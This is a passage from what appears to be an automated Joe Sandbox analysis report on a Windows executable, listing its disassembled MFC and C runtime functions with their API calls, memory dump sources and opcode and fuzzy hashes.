                                                                  • Instruction Fuzzy Hash: 26B1AD72800509EFCF119FA1DC859EE7BB6FF48318F14452AF911A22A0D33989A1DF69
                                                                  Function 0042056E Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00420573
                                                                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004205AB
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004205B3
                                                                    • Part of subcall function 00421E24: UnhookWindowsHookEx.USER32(?), ref: 00421E49
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,00000064,00000000), ref: 004205C5
                                                                  • GetDesktopWindow.USER32 ref: 004205F2
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00420600
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0042060F
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0042069E
                                                                  • GetActiveWindow.USER32 ref: 004206A9
                                                                  • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206B7
                                                                  • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000064,00000000), ref: 004206D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
                                                                  • String ID:
                                                                  • API String ID: 833315621-0
                                                                  • Opcode ID: 9c049424f7e73ca1598ba7117b6125b43015b5989c775a291803d269f1ce4c2f
                                                                  • Instruction ID: dca9b540c62fcd184cdbaef0817d1578ed90b02519734c6228dfb65e1cce7a9d
                                                                  • Opcode Fuzzy Hash: 9c049424f7e73ca1598ba7117b6125b43015b5989c775a291803d269f1ce4c2f
                                                                  • Instruction Fuzzy Hash: 79418331B00325DFDB21AFA5E84976EBBF5AF44715F90042EE501B2292CB785942CA6D
                                                                  Function 0040E812 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(?,00431A70,00000060), ref: 0040E832
                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00431A70,00000060), ref: 0040E885
                                                                  • _fast_error_exit.LIBCMT ref: 0040E8E7
                                                                  • _fast_error_exit.LIBCMT ref: 0040E8F8
                                                                  • GetCommandLineA.KERNEL32(?,00431A70,00000060), ref: 0040E917
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0040E96B
                                                                  • __wincmdln.LIBCMT ref: 0040E971
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040E98E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
                                                                  • String ID: `#vp,$v
                                                                  • API String ID: 3897392166-4109723868
                                                                  • Opcode ID: e1bf0c6c10a35e2feaa378b61d2a2dbd1c9d61abde69f1a15ddcab38a1182d4c
                                                                  • Instruction ID: 0bc8d0c747b5be90a239dc1f6fd12c79bdb3a1e517c7b53da2822559ab0157a6
                                                                  • Opcode Fuzzy Hash: e1bf0c6c10a35e2feaa378b61d2a2dbd1c9d61abde69f1a15ddcab38a1182d4c
                                                                  • Instruction Fuzzy Hash: E241B0B1D002109ADB20BF739D456AE77B0AF44718F24883FE415FB2D2DA7C88928B5D
                                                                  Function 00422CF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00422CFD
                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 00422D15
                                                                  • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 00422D73
                                                                    • Part of subcall function 004222C8: GetWindowRect.USER32(?,004223EA), ref: 004222ED
                                                                    • Part of subcall function 004222C8: GetWindow.USER32(?,00000004), ref: 0042230A
                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00422DA3
                                                                  • RemovePropA.USER32(?,AfxOldWndProc423), ref: 00422DAB
                                                                  • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00422DB2
                                                                  • GlobalDeleteAtom.KERNEL32(00000000), ref: 00422DB9
                                                                    • Part of subcall function 00421338: GetWindowRect.USER32(?,?), ref: 00421344
                                                                  • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 00422E0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
                                                                  • String ID: AfxOldWndProc423
                                                                  • API String ID: 2397448395-1060338832
                                                                  • Opcode ID: 42f8192bdfa06c4a61062a92c3b8c52fd31b5a38a69e1511a4050e6997e842b7
                                                                  • Instruction ID: d0d5fd2a95d0caff163bc92c540bc67e825ba57d28d602554495161fd341ab14
                                                                  • Opcode Fuzzy Hash: 42f8192bdfa06c4a61062a92c3b8c52fd31b5a38a69e1511a4050e6997e842b7
                                                                  • Instruction Fuzzy Hash: D0319632A0012ABFDB11AFA5ED49DFF7F78EF09311F80052AF501A1161C7789912DBA9
                                                                  Function 00421240 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 42libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,00421C6F,?,00040000), ref: 00421249
                                                                  • LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00421252
                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00421266
                                                                  • #17.COMCTL32 ref: 00421281
                                                                  • #17.COMCTL32 ref: 0042129D
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004212AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                  • String ID: COMCTL32.DLL$InitCommonControlsEx$`#vp,$v
                                                                  • API String ID: 1437655972-2158789292
                                                                  • Opcode ID: e4adc865601357d86bd5e694327d93582044c89adc3814df3ac42751e02ffd74
                                                                  • Instruction ID: 95cf30dd8ce34ee92b00f566a42e8099b381b461292cc38c6bf4f8d75c531509
                                                                  • Opcode Fuzzy Hash: e4adc865601357d86bd5e694327d93582044c89adc3814df3ac42751e02ffd74
                                                                  • Instruction Fuzzy Hash: 9BF0A936B00222DB97215F66BD4861BB6ECAFA476175504B6F805F3330CB78DC06467D
                                                                  Function 0042B672 Relevance: 15.2, APIs: 10, Instructions: 181memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00431060), ref: 0042B6FD
                                                                    • Part of subcall function 004059C0: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 004059E2
                                                                  • SysAllocString.OLEAUT32(?), ref: 0042B729
                                                                  • lstrlenA.KERNEL32(?,00431060), ref: 0042B741
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B768
                                                                  • lstrlenA.KERNEL32(?,0000F108,?,00000100,004302DC,00431060), ref: 0042B7B6
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B7DF
                                                                  • lstrlenA.KERNEL32(?), ref: 0042B7FF
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B826
                                                                  • lstrlenA.KERNEL32(?), ref: 0042B84F
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0042B870
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 2903237683-0
                                                                  • Opcode ID: c0277fd87a20140d2149f3f34d2eb646c926a0dbb09a78b738232d21ded5d3b9
                                                                  • Instruction ID: 1a3153decd58b46bd6a0c121a40f0f3a120ecd19db3a4f9c7d82dc57bbc87be9
                                                                  • Opcode Fuzzy Hash: c0277fd87a20140d2149f3f34d2eb646c926a0dbb09a78b738232d21ded5d3b9
                                                                  • Instruction Fuzzy Hash: 54510472A00219EBCB20AF75DC85B9ABBB8FF48354F50452BE915D7281DB38D850CFA4
                                                                  Function 00420977 Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042097C
                                                                  • GetClassInfoA.USER32(?,?,?), ref: 00420997
                                                                  • RegisterClassA.USER32(?), ref: 004209AA
                                                                  • lstrlenA.KERNEL32(-00000034,00000001), ref: 004209E6
                                                                  • lstrlenA.KERNEL32(?), ref: 004209ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Classlstrlen$H_prologInfoRegister
                                                                  • String ID:
                                                                  • API String ID: 3690589370-0
                                                                  • Opcode ID: 306c1d9e215d0fabf92add2f6d1187e6e5450e128d1fc0b5e055ba4f64e6dba0
                                                                  • Instruction ID: 71e2a2145aac47898e1f733674852a82c0eca1208d8ef585954345c2e418f862
                                                                  • Opcode Fuzzy Hash: 306c1d9e215d0fabf92add2f6d1187e6e5450e128d1fc0b5e055ba4f64e6dba0
                                                                  • Instruction Fuzzy Hash: E531B171A00229EFDF11DF60ED45AAEBFF4FF08315F504126E805A2251C738DA51CBA9
                                                                  Function 0041A8B9 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 228COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strcat$___shr_12
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                  • API String ID: 1152255961-4131533671
                                                                  • Opcode ID: 1738a10b470dc6ab355d8796a0499abadeee2c3cf96b2aae57927fffe5d3a795
                                                                  • Instruction ID: f879c1e990ddeebbe466094dc5d8ff8bd54ad08b32661d6171e75fd2fa4a4eb8
                                                                  • Opcode Fuzzy Hash: 1738a10b470dc6ab355d8796a0499abadeee2c3cf96b2aae57927fffe5d3a795
                                                                  • Instruction Fuzzy Hash: 8C81367180528A8ECF11CBA8C9447FF7BB4AF15314F09455BD850EB282D37C9695C3AB
                                                                  Function 00420361 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00420366
                                                                  • GetSystemMetrics.USER32(0000002A), ref: 0042042A
                                                                  • GlobalLock.KERNEL32(00000000,?,?,?,?), ref: 00420495
                                                                  • CreateDialogIndirectParamA.USER32(?,?,?,Function_0001FDFB,00000000), ref: 004204C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
                                                                  • String ID: MS Shell Dlg
                                                                  • API String ID: 2364537584-76309092
                                                                  • Opcode ID: 9646e25077798d77b5deeb05f9c54692e781d64a2f7a8cb0eff1768c936a2d1f
                                                                  • Instruction ID: e5cb62502933813201733bd9fc32693ef396ee62b0366fab134f26ca96ffc902
                                                                  • Opcode Fuzzy Hash: 9646e25077798d77b5deeb05f9c54692e781d64a2f7a8cb0eff1768c936a2d1f
                                                                  • Instruction Fuzzy Hash: F551B431B00229DFCB14EFA5E8459EEBBF4AF44314F94456BF502E7292D7388981CB59
                                                                  Function 004159C0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strncpy$_strcspn
                                                                  • String ID: ,$,$.$_$_.,
                                                                  • API String ID: 209312476-1893563293
                                                                  • Opcode ID: 2e43a5f81b777912afccb140e69afc6829ec4401cf3e0a016be81a25e8608456
                                                                  • Instruction ID: 094b99d490e66d553d3a6f78acc3330e94534354dd0d36d43b286bc5cd0e5350
                                                                  • Opcode Fuzzy Hash: 2e43a5f81b777912afccb140e69afc6829ec4401cf3e0a016be81a25e8608456
                                                                  • Instruction Fuzzy Hash: 6F216B315C0A06EDEF308A64C881BEB3758AF913E4F584717F8498A281D33CA9C5C79D
                                                                  Function 00425A8C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStockObject.GDI32(00000011), ref: 00425AB0
                                                                  • GetStockObject.GDI32(0000000D), ref: 00425AB8
                                                                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 00425AC5
                                                                  • GetDC.USER32(00000000), ref: 00425AD4
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00425AE8
                                                                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00425AF4
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00425AFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                  • String ID: System
                                                                  • API String ID: 46613423-3470857405
                                                                  • Opcode ID: fe69864a35ea89a40515d5fc80cfd6c8ee3fb8849cac013ddd10af84c3ff34a8
                                                                  • Instruction ID: ffff926d86ea4a8282c210a474db753b18fb332d241bf638c921fd37c398010f
                                                                  • Opcode Fuzzy Hash: fe69864a35ea89a40515d5fc80cfd6c8ee3fb8849cac013ddd10af84c3ff34a8
                                                                  • Instruction Fuzzy Hash: 6B115471B00228EBEB20DFA1ED85FAE7B78AF04744F404125F605A71D0D7B49D42CBA8
                                                                  Function 0041ACBC Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CompareStringW.KERNEL32(00000000,00000000,004322C4,00000001,004322C4,00000001,00433B18,00000040,00419FC8,?,00000001,?,00000000,?,00000000,?), ref: 0041ACE8
                                                                  • GetLastError.KERNEL32(?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018,00000000,?,?,0000016D,00000000,?), ref: 0041ACFA
                                                                  • GetCPInfo.KERNEL32(00000000,00000000,00433B18,00000040,00419FC8,?,00000001,?,00000000,?,00000000,?,^@,004176DC,00000000,00000000), ref: 0041ADA4
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AE32
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEC8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AF3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                  • String ID:
                                                                  • API String ID: 1773772771-0
                                                                  • Opcode ID: 5a6277f7f7645b34a1ca5d23e9bca92d5f01ef7ed54ed092bd0c7847a4edd101
                                                                  • Instruction ID: f5f744d86d54cd8ca6db1966468d69e19fe399d0adc8f6adef735f185170d353
                                                                  • Opcode Fuzzy Hash: 5a6277f7f7645b34a1ca5d23e9bca92d5f01ef7ed54ed092bd0c7847a4edd101
                                                                  • Instruction Fuzzy Hash: D0B1C471901209AFCF21DF65DC41AEF7BB6EF08354F14012BF811A62A0D73989E5CB9A
                                                                  Function 0040F55C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 0040F614
                                                                  • __allrem.LIBCMT ref: 0040F62C
                                                                  • __allrem.LIBCMT ref: 0040F648
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F683
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F69F
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F6B6
                                                                    • Part of subcall function 004150CA: __lock.LIBCMT ref: 004150E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 4106114094-3067454934
                                                                  • Opcode ID: f69c0a922e78807a0b225c01b9b7e650e9e6c5e0ad57cf8c216420461cf175c5
                                                                  • Instruction ID: 0793e8c0385b27168c5ed49dc395ad643d610412e7e07f13e1331a588879ac93
                                                                  • Opcode Fuzzy Hash: f69c0a922e78807a0b225c01b9b7e650e9e6c5e0ad57cf8c216420461cf175c5
                                                                  • Instruction Fuzzy Hash: 54719F75E00209BFDB24DFA9CC81B9EB7B6EB84314F14817AF510F3691D3789A448B59
                                                                  Function 0040F7B9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004148BE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414930
                                                                  • __allrem.LIBCMT ref: 0040F8CC
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F8ED
                                                                  • __allrem.LIBCMT ref: 0040F909
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F92C
                                                                  • __allrem.LIBCMT ref: 0040F948
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040F96B
                                                                    • Part of subcall function 00415116: __lock.LIBCMT ref: 00415124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                  • String ID: ^@
                                                                  • API String ID: 1282128132-3067454934
                                                                  • Opcode ID: 503f9c629e17bedf12aa749e16a2be0b44da8eaeb40d5e21e031042d8dcd9b81
                                                                  • Instruction ID: 6440d212c24c971b3252e86089126bc21e948c25b89904ef9f819ef4e6195108
                                                                  • Opcode Fuzzy Hash: 503f9c629e17bedf12aa749e16a2be0b44da8eaeb40d5e21e031042d8dcd9b81
                                                                  • Instruction Fuzzy Hash: 9C61B3B2900605EFDB24DF69C880AAEB7F5EB84314F24853FE455E3791D7349E898B48
                                                                  Function 00408DE1 Relevance: 12.3, APIs: 8, Instructions: 303memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00408DE6
                                                                    • Part of subcall function 0040780C: CoGetClassObject.OLE32(?,?,00000000,00433C4C,?), ref: 0040782C
                                                                    • Part of subcall function 00426B5A: __EH_prolog.LIBCMT ref: 00426B5F
                                                                    • Part of subcall function 00426B15: __EH_prolog.LIBCMT ref: 00426B1A
                                                                  • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00408F6F
                                                                  • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00408F90
